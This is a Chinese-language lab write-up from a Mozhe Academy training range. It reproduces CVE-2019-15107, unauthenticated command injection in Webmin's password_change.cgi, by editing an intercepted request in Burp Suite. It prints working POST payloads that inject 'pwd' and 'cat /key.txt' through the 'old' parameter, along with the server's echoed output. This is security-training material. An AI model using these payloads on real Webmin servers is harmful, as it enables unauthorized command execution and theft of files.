墨者学院—Webmin未经身份验证的远程代码执行（简单复习）

墨者学院—Webmin未经身份验证的远程代码执行（简单复习）

背景描述：

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计，互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后，攻击者可以通过发送POST请求在目标系统中执行任意命令，且无需身份验证。

漏洞介绍（cve-2019-15107）

1.漏洞编号： cve-2019-15107
2.漏洞描述： 该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码，该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
3.影响版本： Webmin<=1.920

靶场实操

启动靶场后，进入靶场界面，注意title为login，后面会因为这个做改动

抓包修改

打开burp suite，开启代理，点击Sign in按钮

把所抓到的数据报发送到Repeater模块，进行数据修改，发送

在这里我们能看到，页面数据显示为**/session_login.cgi**，而漏洞复现资料里是**/password_change.cgi**，所以在这里要进行修改，对提交的**user=&pass=**进行修改，利用百度漏洞资料中的poc进行模仿构造自己的语句

user=qwe&pam=1&expired=2&old=laji|pwd&new1=laji&new2=laji

响应报

在修改好所有点之后，点击go发送，查看回显数据

在这里我用的是pwd命令，回显内容为

<h3>Failed to change password : The current password is incorrect/usr/share/webmin/acl</h3>

给出了当前所在路径，说明成功执行，只需要改变命令就可以了

换命令拿key值

根据以往做墨者靶场的经验，尝试在根目录下找key.txt文件，在这里我用的是cat命令，能显示出文件中的内容

user=qwe&pam=1&expired=2&old=laji|cat /key.txt&new1=laji&new2=laji

成功拿到key值

资料

多查询资料有帮助自己积累经验，以上仅是辣鸡的我个人观点，还请多多指教。

1. https://xz.aliyun.com/t/6040（阿里云资料）
2. http://blog.topsec.com.cn/webmin%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88cve-2019-15107%EF%BC%89%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90/（天融信）